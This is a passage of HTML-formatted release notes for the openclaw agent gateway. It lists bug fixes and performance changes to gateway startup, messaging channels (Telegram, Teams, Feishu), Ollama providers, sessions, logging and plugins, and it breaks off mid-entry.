<li>Gateway/startup: keep primary-model startup prewarm on scoped metadata preparation, let native approval bootstraps retry outside channel startup, and skip the global hook runner when no <code>gateway_start</code> hook is registered, so clean post-ready sidecar work stays off the critical path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336399068" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72846" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72846/hovercard" href="https://github.com/openclaw/openclaw/issues/72846">#72846</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RayWoo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RayWoo">@RayWoo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/livekm0309/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/livekm0309">@livekm0309</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrz1836/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrz1836">@mrz1836</a>.</li>
<li>Gateway/channels: start bundled channel accounts with a lightweight <code>runtimeContexts</code> surface instead of importing the full reply/routing/session channel runtime before <code>startAccount</code>, so Discord, Telegram, Slack, Matrix, and QQBot startup no longer block on unrelated channel helper graphs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336399068" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72846" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72846/hovercard" href="https://github.com/openclaw/openclaw/issues/72846">#72846</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337770989" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72960" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72960/hovercard" href="https://github.com/openclaw/openclaw/issues/72960">#72960</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrz1836/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrz1836">@mrz1836</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RayWoo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RayWoo">@RayWoo</a>, and @rollingshmily.</li>
<li>Gateway/supervisor: exit cleanly when a supervised restart finds an existing healthy gateway and bound retries when the existing gateway stays unhealthy, so stale lock contention cannot loop indefinitely. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336399068" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72846" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72846/hovercard" href="https://github.com/openclaw/openclaw/issues/72846">#72846</a>. Thanks @azgardtek.</li>
<li>Gateway/startup: scope primary-model provider discovery during channel prewarm to the configured provider owner and add split startup trace timings, so boot avoids staging unrelated bundled provider dependencies while setup discovery remains broad. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338390058" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73002" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73002/hovercard" href="https://github.com/openclaw/openclaw/issues/73002">#73002</a>. Thanks @Schnup03.</li>
<li>Plugins/runtime deps: declare retained staged bundled plugin dependencies in the npm staging manifest while installing only newly missing packages, so Gateway restarts avoid reinstalling the full retained dependency set when one runtime dependency is absent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339108345" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73055" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73055/hovercard" href="https://github.com/openclaw/openclaw/issues/73055">#73055</a>. Thanks @GCorp2026.</li>
<li>CLI/status: keep default <code>openclaw status</code> off the heavyweight security audit, plugin compatibility, and memory-vector probes while still showing configured Telegram channels through setup metadata, so routine health checks stay fast and no longer render an empty Channels table. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338209541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72993" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72993/hovercard" href="https://github.com/openclaw/openclaw/issues/72993">#72993</a>. Thanks @comick1.</li>
<li>Channels/Telegram: send a best-effort native typing cue immediately after an inbound message is accepted, so slow pre-dispatch turns show Telegram liveness before queueing, compaction, model, or tool work starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4232643063" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63759" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63759/hovercard" href="https://github.com/openclaw/openclaw/issues/63759">#63759</a>. Thanks @alessandropcostabr.</li>
<li>Channels/Telegram: stop native approval startup auth failures from retrying every second, while still waiting through retryable Gateway auth handoffs, so Telegram approval setup problems no longer create a reconnect/log loop during channel startup. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336399068" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72846" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72846/hovercard" href="https://github.com/openclaw/openclaw/issues/72846">#72846</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336796824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72867/hovercard" href="https://github.com/openclaw/openclaw/issues/72867">#72867</a>. Thanks @kiranvk-2011 and @porly1985.</li>
<li>Channels/Microsoft Teams: unwrap staged CommonJS JWT runtime dependencies before Bot Connector token validation so inbound Teams messages no longer 401 after the bundled runtime-deps move. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338718429" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73026" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73026/hovercard" href="https://github.com/openclaw/openclaw/issues/73026">#73026</a>. Thanks @kbrown10000.</li>
<li>Gateway/auth: allow local direct callers in trusted-proxy mode to use the configured gateway password as an internal fallback while keeping token fallback rejected. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3945900988" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/17761" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/17761/hovercard" href="https://github.com/openclaw/openclaw/issues/17761">#17761</a>. Thanks @dashed, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, and @jetd1.</li>
<li>Gateway/auth: add explicit <code>trustedProxy.allowLoopback</code> support for same-host loopback reverse proxies while keeping loopback trusted-proxy auth fail-closed by default and preserving required-header and allowlist checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188620757" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59167" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59167/hovercard" href="https://github.com/openclaw/openclaw/issues/59167">#59167</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4227796213" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63379" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63379/hovercard" href="https://github.com/openclaw/openclaw/pull/63379">#63379</a>. Thanks @Matir, @jeremyakers, and @mrosmarin.</li>
<li>Channels/sessions: prevent guarded inbound session recording from creating route-only phantom sessions while still allowing last-route updates for sessions that already exist. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338488486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73009" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73009/hovercard" href="https://github.com/openclaw/openclaw/pull/73009">#73009</a>. Thanks @jzakirov.</li>
<li>Cron: accept <code>delivery.threadId</code> in Gateway cron add/update schemas so scheduled announce delivery can target Telegram forum topics and other threaded channel destinations through the documented delivery path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338638195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73017/hovercard" href="https://github.com/openclaw/openclaw/issues/73017">#73017</a>. Thanks @coachsootz.</li>
<li>Plugins/runtime deps: stage bundled plugin dependencies imported by mirrored root dist chunks, so packaged memory and status commands do not miss <code>chokidar</code> or similar root-chunk dependencies after update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336949413" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72882/hovercard" href="https://github.com/openclaw/openclaw/issues/72882">#72882</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337873931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72970" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72970/hovercard" href="https://github.com/openclaw/openclaw/issues/72970">#72970</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338190423" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72992" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72992/hovercard" href="https://github.com/openclaw/openclaw/issues/72992">#72992</a>. Thanks @shrimpy8, @colin-chang, and @Schnup03.</li>
<li>Plugins/runtime deps: reuse unchanged bundled plugin runtime mirrors instead of rebuilding plugin trees on every load, cutting avoidable writes and restart/reconnect I/O on slow storage. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337456774" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72933" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72933/hovercard" href="https://github.com/openclaw/openclaw/issues/72933">#72933</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jasonftl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jasonftl">@jasonftl</a>.</li>
<li>Agents/runtime context: deliver hidden runtime context through prompt-local system context while keeping the transcript-only custom entry out of provider user turns, and strip stale copied runtime-context prefaces from user-facing replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332131924" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72386" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72386/hovercard" href="https://github.com/openclaw/openclaw/issues/72386">#72386</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337871339" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72969" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72969/hovercard" href="https://github.com/openclaw/openclaw/pull/72969">#72969</a>. Thanks @jhsmith409.</li>
<li>Channels/Telegram: skip the optional webhook-info API call during polling-mode status checks and startup bot-label probes so long-polling setups avoid an unnecessary Telegram round trip. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338178741" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72990" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72990/hovercard" href="https://github.com/openclaw/openclaw/pull/72990">#72990</a>. Thanks @danielgruneberg.</li>
<li>CLI/message: resolve targeted <code>openclaw message</code> channels to their owning plugin before loading the registry, and fall back to configured channel plugins when the channel must be inferred, so scripted sends avoid full bundled plugin registry scans without assuming channel ids match plugin ids. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338464996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73006" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73006/hovercard" href="https://github.com/openclaw/openclaw/issues/73006">#73006</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jasonftl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jasonftl">@jasonftl</a>.</li>
<li>Plugins/startup: parse strict JSON plugin manifests with native JSON first and keep JSON5 as the compatibility fallback, reducing manifest registry CPU during Gateway boot and CLI startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338504645" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73011" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73011/hovercard" href="https://github.com/openclaw/openclaw/issues/73011">#73011</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jasonftl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jasonftl">@jasonftl</a>.</li>
<li>CLI/models: keep route-first <code>models status --json</code> stdout reserved for the JSON payload by routing auth-profile and startup diagnostics to stderr. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337789017" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72962" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72962/hovercard" href="https://github.com/openclaw/openclaw/issues/72962">#72962</a>. Thanks @vishutdhar.</li>
<li>Gateway/runtime: keep dirty-tree status calls from rebuilding live <code>dist</code>, clear stale task and restart state across in-process restarts, retry transient Discord lazy imports, and let channel startup continue after slow model warmup so browser, Discord, and voice-call sidecars come online. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/CodeQL: replace file SecretRef id gateway schema regex validation with segment-aligned predicates and set empty permissions on release summary/backfill jobs so the narrowed CodeQL profile stays clean. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Sessions: ignore future-dated session activity timestamps during reset freshness checks and cap future <code>updatedAt</code> values at the merge boundary so clock-skewed messages cannot keep stale sessions alive forever. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338169255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72989" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72989/hovercard" href="https://github.com/openclaw/openclaw/issues/72989">#72989</a>. Thanks @martingarramon.</li>
<li>Sessions: apply search, activity filters, and limits before gateway row enrichment so bounded session lists avoid scanning discarded transcripts. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337964654" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72978" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72978/hovercard" href="https://github.com/openclaw/openclaw/pull/72978">#72978</a>. Thanks @yeager.</li>
<li>Sessions: remove trajectory runtime and pointer sidecars when session maintenance prunes, caps, or disk-evicts their owning session, while preserving sidecars still referenced by live rows. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338364401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73000" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73000/hovercard" href="https://github.com/openclaw/openclaw/issues/73000">#73000</a>. Thanks @jared-rebel.</li>
<li>Plugins/CLI: allow managed plugin installs when the active extensions root is a symlink to a real state directory, while keeping nested target symlinks blocked and suppressing misleading hook-pack fallback errors for install-boundary failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337538823" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72946" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72946/hovercard" href="https://github.com/openclaw/openclaw/issues/72946">#72946</a>. Thanks @mayank6136.</li>
<li>Providers/Ollama: mark discovered Ollama catalog models as supporting streaming usage metadata so token accounting stays enabled for local models. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337951581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72976" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72976/hovercard" href="https://github.com/openclaw/openclaw/pull/72976">#72976</a>) Thanks @sdeyang.</li>
<li>Media understanding: reject malformed MIME values with trailing junk while preserving standard parameter tails before enrichment uses them. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337267723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72914" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72914/hovercard" href="https://github.com/openclaw/openclaw/pull/72914">#72914</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/volcano303/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/volcano303">@volcano303</a>.</li>
<li>WebChat: keep bare <code>/new</code> and <code>/reset</code> prompts from producing empty transcript text by inserting the hidden session marker when the visible tail is blank. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336713074" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72863" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72863/hovercard" href="https://github.com/openclaw/openclaw/pull/72863">#72863</a>) Thanks @mahopan.</li>
<li>CLI/update: explain completion-cache refresh timeouts with manual refresh guidance instead of surfacing a raw low-level timeout. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336309267" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72842/hovercard" href="https://github.com/openclaw/openclaw/issues/72842">#72842</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336515486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72850" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72850/hovercard" href="https://github.com/openclaw/openclaw/pull/72850">#72850</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iot2edge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iot2edge">@iot2edge</a>.</li>
<li>Memory-core/dreaming: give narrative generation a 60-second timeout so slower local or remote models can finish instead of timing out at 15 seconds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336220062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72837" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72837/hovercard" href="https://github.com/openclaw/openclaw/issues/72837">#72837</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336522097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72852" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72852/hovercard" href="https://github.com/openclaw/openclaw/pull/72852">#72852</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RayWoo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RayWoo">@RayWoo</a>.</li>
<li>Plugins/hooks: inject each plugin's resolved config into internal hook event context without mutating the shared event object. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337006350" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72888" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72888/hovercard" href="https://github.com/openclaw/openclaw/pull/72888">#72888</a>) Thanks @jalapeno777.</li>
<li>Agents/ACP: pass the resolved ACP agent directory into media understanding so per-agent media caches and config are used for ACP-dispatched image turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336153101" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72832" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72832/hovercard" href="https://github.com/openclaw/openclaw/pull/72832">#72832</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>.</li>
<li>Gateway/Bonjour: truncate mDNS service names and host labels to the 63-byte DNS label limit at valid UTF-8 boundaries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335853257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72809" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72809/hovercard" href="https://github.com/openclaw/openclaw/pull/72809">#72809</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>.</li>
<li>Feishu: treat groups explicitly configured under channels.feishu.groups as admitted even when groupAllowFrom is empty, while preserving groupPolicy: "disabled" as a hard group block and keeping groups.* wildcard defaults non-admitting. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276123133" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67687/hovercard" href="https://github.com/openclaw/openclaw/issues/67687">#67687</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335551932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72789" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72789/hovercard" href="https://github.com/openclaw/openclaw/pull/72789">#72789</a>) Thanks @MoerAI.</li>
<li>Gateway/startup: keep hot Gateway boot paths on leaf config imports and add max-RSS reporting to the gateway startup bench so low-memory startup regressions are visible before release. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>WebChat: read <code>chat.history</code> from active transcript branches, drop stale streamed assistant tails once final history catches up, and coalesce duplicate in-flight Control UI submits, so rewritten prompts, completed replies, and rapid send events no longer render or process twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337951573" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72975/hovercard" href="https://github.com/openclaw/openclaw/issues/72975">#72975</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337799302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72963/hovercard" href="https://github.com/openclaw/openclaw/issues/72963">#72963</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337936981" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72974" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72974/hovercard" href="https://github.com/openclaw/openclaw/issues/72974">#72974</a>. Thanks @dmagdici, @lhtpluto, and @Benjamin5281999.</li>
<li>WebChat/TTS: persist automatic final-mode TTS audio as a supplemental audio-only transcript update instead of adding a second assistant message with the same visible text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336135891" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72830" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72830/hovercard" href="https://github.com/openclaw/openclaw/issues/72830">#72830</a>. Thanks @lhtpluto.</li>
<li>Agents/LSP: terminate bundled stdio LSP process trees during runtime disposal and Gateway shutdown, so nested children such as <code>tsserver</code> do not survive stop or restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331967579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72357/hovercard" href="https://github.com/openclaw/openclaw/issues/72357">#72357</a>. Thanks @ai-hpc and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</li>
<li>Diagnostics/OTEL: capture privacy-safe model-call request payload bytes, streamed response bytes, first-response latency, and total duration in diagnostic events, plugin hooks, stability snapshots, and OTEL model-call spans/metrics without logging raw model content. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4019760959" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33832" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33832/hovercard" href="https://github.com/openclaw/openclaw/issues/33832">#33832</a>. Thanks @wwh830.</li>
<li>Logging: write validated diagnostic trace context as top-level <code>traceId</code>, <code>spanId</code>, <code>parentSpanId</code>, and <code>traceFlags</code> fields in file-log JSONL records so traced requests and model calls are easier to correlate in log processors. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042435480" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40353" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40353/hovercard" href="https://github.com/openclaw/openclaw/issues/40353">#40353</a>. Thanks @liangruochong44-ui.</li>
<li>Logging/sessions: apply configured redaction patterns to persisted session transcript text and accept escaped character classes in safe custom redaction regexes, so transcript JSONL no longer keeps matching sensitive text in the clear. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056740716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42982/hovercard" href="https://github.com/openclaw/openclaw/issues/42982">#42982</a>. Thanks @panpan0000.</li>
<li>Providers/Ollama: honor <code>/api/show</code> capabilities when registering local models so non-tool Ollama models no longer receive the agent tool surface, and keep native Ollama thinking opt-in instead of enabling it by default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243652449" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64710" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64710/hovercard" href="https://github.com/openclaw/openclaw/issues/64710">#64710</a> and duplicate <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4247974485" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65343" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65343/hovercard" href="https://github.com/openclaw/openclaw/issues/65343">#65343</a>. Thanks @yuan-b, @netherby, @xilopaint, and @Diyforfun2026.</li>
<li>Control UI/Agents: remount the Overview model controls when switching agents so the primary-model picker cannot retain stale per-agent selection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040239436" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39392" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39392/hovercard" href="https://github.com/openclaw/openclaw/issues/39392">#39392</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040268087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39401" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39401/hovercard" href="https://github.com/openclaw/openclaw/pull/39401">#39401</a>, notes the duplicate <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040506831" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39495/hovercard" href="https://github.com/openclaw/openclaw/pull/39495">#39495</a> approach, and keeps <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076009746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46275" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46275/hovercard" href="https://github.com/openclaw/openclaw/pull/46275">#46275</a>/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4138805247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54724/hovercard" href="https://github.com/openclaw/openclaw/pull/54724">#54724</a> broader stabilization out of scope. Thanks @daijunyi002, @SergioChan, @aworki, and @wsyjh8.</li>
<li>Auto-reply: poison inbound message dedupe after replay-unsafe provider/runtime failures so retries stay safe before visible progress but cannot duplicate messages after block output, tool side effects, or session progress. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295112826" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69303" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69303/hovercard" href="https://github.com/openclaw/openclaw/issues/69303">#69303</a>; keeps <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4181977803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58549" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58549/hovercard" href="https://github.com/openclaw/openclaw/issues/58549">#58549</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242766269" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64606" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64606/hovercard" 